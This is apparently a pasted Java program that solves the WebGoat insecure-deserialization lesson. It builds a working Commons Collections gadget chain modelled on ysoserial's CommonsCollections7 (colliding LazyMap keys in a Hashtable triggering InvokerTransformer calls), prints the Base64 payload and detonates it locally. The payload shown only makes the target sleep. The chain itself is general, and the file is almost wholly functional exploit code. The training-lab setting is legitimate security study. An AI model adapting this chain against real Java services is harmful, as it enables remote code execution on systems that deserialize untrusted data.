ItsTotallyRSX

Webgoat Java serialization solution

Aug 20th, 2019
  1. package sx.reece.webgoat;
  2.  
  3. import java.io.*;
  4. import java.lang.reflect.Field;
  5. import java.util.Base64;
  6. import java.util.HashMap;
  7. import java.util.Hashtable;
  8. import java.util.Map;
  9. import java.util.concurrent.TimeUnit;
  10.  
  11. import org.apache.commons.collections.Transformer;
  12. import org.apache.commons.collections.functors.ChainedTransformer;
  13. import org.apache.commons.collections.functors.ConstantTransformer;
  14. import org.apache.commons.collections.functors.InvokerTransformer;
  15. import org.apache.commons.collections.map.LazyMap;
  16.  
  17. import sx.reece.javakit.logger.Logger;
  18.  
// Based on ysoserial. Note the layout below (a Hashtable holding two LazyMaps whose only keys "yy"/"zZ"
// collide on String.hashCode()) is ysoserial's CommonsCollections7 gadget, not CommonsCollections1 as the
// original link suggested; CC1 reaches LazyMap through AnnotationInvocationHandler instead.
// https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections7.java
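/**
 * Builds a Java-deserialization payload for the WebGoat insecure-deserialization
 * lesson, prints it Base64-encoded, then deserializes it locally to prove the
 * gadget fires.
 *
 * <p>Gadget (ysoserial's Hashtable/LazyMap hash-collision chain): two {@link LazyMap}s
 * whose only keys, {@code "yy"} and {@code "zZ"}, share the same {@code String.hashCode()}
 * are stored as keys of a {@link Hashtable}. Rebuilding the Hashtable on the target forces
 * an {@code equals()} between the colliding keys; {@code AbstractMap.equals()} calls
 * {@code get()} on the other map for a key it lacks, and LazyMap answers the miss by
 * running the transformer chain. The chain resolves {@code Thread.sleep(long)} by
 * reflection and invokes it, so a vulnerable deserializer blocks for {@link #SLEEP_TIME}.
 *
 * <p>Needs Commons Collections 3.x ({@code org.apache.commons.collections}) on the class
 * path. NOTE(review): 3.2.2 and later refuse to deserialize InvokerTransformer unless
 * unsafe functor serialization is explicitly enabled, so {@link #testExploit} should throw
 * there rather than sleep -- confirm against the version actually in use.
 */
public class Webgoat {
    /** How long the gadget makes the target block, in milliseconds. */
    private static final long SLEEP_TIME = TimeUnit.SECONDS.toMillis(5);

    /**
     * Thread.class -> Thread.getMethod("sleep", long) -> Method.invoke(null, SLEEP_TIME).
     * Method.invoke returns null for a void method; that null makes the
     * AbstractMap.equals() comparison on the target come out false, which is
     * required: if the two LazyMaps compared equal, Hashtable.readObject would
     * reject the duplicate key with a StreamCorruptedException.
     */
    private static final Transformer[] EXPLOIT_CHAIN = new Transformer[]{
            new ConstantTransformer(Thread.class),
            new InvokerTransformer("getMethod",
                    new Class[]{String.class, Class[].class},
                    new Object[]{"sleep", new Class[]{long.class}}),
            new InvokerTransformer("invoke",
                    new Class[]{Object.class, Object[].class},
                    new Object[]{null, new Object[]{SLEEP_TIME}})};

    /**
     * Swaps EXPLOIT_CHAIN into an already-constructed ChainedTransformer.
     * The field is private final with no setter, hence reflection. Kept as a
     * separate step so the chain is armed only once the payload is assembled.
     *
     * @param chain the ChainedTransformer to arm (mutated in place)
     * @throws ReflectiveOperationException if the field cannot be reached or set
     */
    private static void armTransformer(Transformer chain) throws ReflectiveOperationException {
        Field transformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        transformers.setAccessible(true);
        transformers.set(chain, EXPLOIT_CHAIN);
    }

    /**
     * Assembles the object graph to serialize.
     *
     * <p>Order matters: {@code hashtable.put(lazyMap2, 2)} already performs the
     * colliding-key comparison that fires the gadget, so the chain is left empty
     * until the Hashtable is populated and only armed afterwards. Arming it first
     * (as the earlier version of this file did) runs the payload on the generating
     * JVM -- a harmless 5 s sleep here, arbitrary code for any other chain.
     *
     * @return the Hashtable to serialize
     * @throws ReflectiveOperationException if arming the chain fails
     */
    @SuppressWarnings({"rawtypes", "unchecked"}) // Commons Collections 3.x API is pre-generics
    private static Object craftExploit() throws ReflectiveOperationException {
        Transformer evil = new ChainedTransformer(new Transformer[]{});

        Map lazyMap1 = LazyMap.decorate(new HashMap(), evil);
        Map lazyMap2 = LazyMap.decorate(new HashMap(), evil);
        lazyMap1.put("yy", 1);
        lazyMap2.put("zZ", 1); // "yy".hashCode() == "zZ".hashCode() == 3872

        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        // Same bucket as lazyMap1 -> lazyMap1.equals(lazyMap2) -> lazyMap2.get("yy")
        // -> LazyMap runs the (still empty) chain and caches a "yy" entry in lazyMap2.
        hashtable.put(lazyMap2, 2);

        armTransformer(evil);

        // Drop the "yy" entry the comparison above added so each map again has
        // exactly one key and the target repeats the collision + equals() path.
        lazyMap2.remove("yy");

        return hashtable;
    }

    /**
     * Java-serializes {@code obj}.
     *
     * @param obj the payload graph
     * @return the serialized bytes (stream header AC ED 00 05)
     * @throws IOException on serialization failure
     */
    private static byte[] serializeExploit(Object obj) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        // try-with-resources closes (and therefore flushes) the object stream,
        // so everything buffered inside it has reached `out` before toByteArray().
        try (ObjectOutputStream oos = new ObjectOutputStream(out)) {
            oos.writeObject(obj);
        }
        return out.toByteArray();
    }

    /**
     * Base64-encodes the serialized payload into the form the lesson input takes.
     *
     * @param buffer serialized bytes
     * @return standard (non-URL-safe, padded) Base64 text; starts with "rO0AB"
     */
    private static String obtainWebgoatPayload(byte[] buffer) {
        // encodeToString avoids new String(byte[]) and its platform-default-charset dependence.
        return Base64.getEncoder().encodeToString(buffer);
    }

    /**
     * Deserializes the payload in THIS JVM to prove the chain fires. This is the
     * vulnerable pattern itself -- ObjectInputStream.readObject on attacker-shaped
     * bytes with no ObjectInputFilter -- and is only acceptable here because the
     * bytes were produced a moment ago by this same program.
     *
     * @param buffer serialized payload
     * @throws IOException            on stream errors
     * @throws ClassNotFoundException if a class in the stream is not on the class path
     */
    private static void testExploit(byte[] buffer) throws IOException, ClassNotFoundException {
        long started = System.nanoTime();
        try (ObjectInputStream iis = new ObjectInputStream(new ByteArrayInputStream(buffer))) {
            Logger.log("Sleeping for five seconds...");
            iis.readObject();
        }
        long elapsedMs = TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - started);
        Logger.log("Did I sleep?");
        // Measured rather than eyeballed: the gadget fired iff this is >= SLEEP_TIME.
        Logger.debug("readObject() took %s ms (gadget delay is %s ms)", elapsedMs, SLEEP_TIME);
    }

    /** Builds the payload, prints its Base64 form for the lesson, then detonates it locally. */
    public static void main(String[] args) throws Exception {
        Object exploit = craftExploit();
        byte[] buf = serializeExploit(exploit);

        Logger.debug("Webgoat payload: %s", obtainWebgoatPayload(buf));

        testExploit(buf);
    }
}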